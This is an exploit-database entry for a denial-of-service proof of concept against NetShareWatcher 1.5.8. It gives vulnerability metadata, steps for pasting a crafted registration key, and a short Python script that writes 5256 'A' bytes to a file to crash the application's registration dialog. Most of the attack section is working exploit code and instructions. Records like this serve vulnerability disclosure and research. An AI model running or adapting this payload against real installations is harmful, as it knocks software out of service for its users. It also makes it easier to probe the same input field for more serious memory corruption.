NetShareWatcher 1.5.8 - Denial of Service (PoC)

vendor:

NetShareWatcher

by:

T3jv1l

7.5

CVSS

HIGH

Denial of Service

CWE

Product Name: NetShareWatcher

Affected Version From: NetShareWatcher 1.5.8

Affected Version To: NetShareWatcher 1.5.8

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 SP1 x86

2018

NetShareWatcher 1.5.8 – Denial of Service (PoC)

This exploit allows an attacker to create a file that causes a denial of service in NetShareWatcher 1.5.8. By providing a specially crafted payload, the application crashes when the file is used in the registration process.

Mitigation:

The vendor has not provided any specific mitigation steps for this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: NetShareWatcher 1.5.8 - Denial of Service (PoC)
# Date: 2018-12-25
# Exploit Author: T3jv1l
# Vendor Homepage: :http://www.nsauditor.com
# Software: http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe
# Contact: https://twitter.com/T3jv1l
# Version: NetShareWatcher 1.5.8
# Tested on: Windows 7 SP1 x86
# Other software from the vendor affected 
# Software: http://www.nbmonitor.com/downloads/nbmonitor_setup.exe

# PoC:
# 1.  Download and install the setup file
# 2.  A file "PoC.txt" will be created
# 3.  Click Help > Register... in tool bar
# 4.  Copy the contents of the file (PoV.txt) and paste in the Registration Key/Name field 
# 5.  Click OK and BOOMMMM !!!! 

#!/usr/bin/python

buffer = "\x41" * 5256

payload = buffer
try:
    f=open("PoC.txt","w")
    print "[+] Creating %s bytes payload..." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"